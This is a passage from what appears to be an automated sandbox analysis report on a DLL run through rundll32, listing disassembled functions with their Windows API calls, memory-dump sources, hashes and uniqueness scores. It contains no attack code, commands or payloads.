                                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2841959276-0
                                                                                                                                    • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                    • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                                    • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                    • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                    • _memset.LIBCMT ref: 10029DA5
                                                                                                                                      • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                      • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                      • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2905758408-0
                                                                                                                                    • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                    • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                                    • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                    • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3574576181-0
                                                                                                                                    • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                    • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                                    • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                    • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                    • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                    • String ID: Software\
                                                                                                                                    • API String ID: 3878845136-964853688
                                                                                                                                    • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                    • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                                    • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                    • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                    • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                    • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                    • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                    • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2853195852-0
                                                                                                                                    • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                    • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                                    • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                    • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3219385341-0
                                                                                                                                    • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                    • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                                    • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                    • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                    • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                    • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$LongParentVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 506644340-0
                                                                                                                                    • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                    • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                    • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                    • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                    • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                    • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                    • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                    • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                      • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                    • String ID: V&'
                                                                                                                                    • API String ID: 1067611704-802299783
                                                                                                                                    • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                    • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                    • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                    • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                      • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2004563703-0
                                                                                                                                    • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                    • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                    • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                    • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                                    • String ID: software
                                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                                    • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                    • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                                    • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                    • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                      • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                      • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                      • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                      • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Task_impl$H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1204490572-0
                                                                                                                                    • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                    • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                                    • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                    • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                      • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                    • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                      • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 356813703-0
                                                                                                                                    • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                    • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                                    • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                    • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
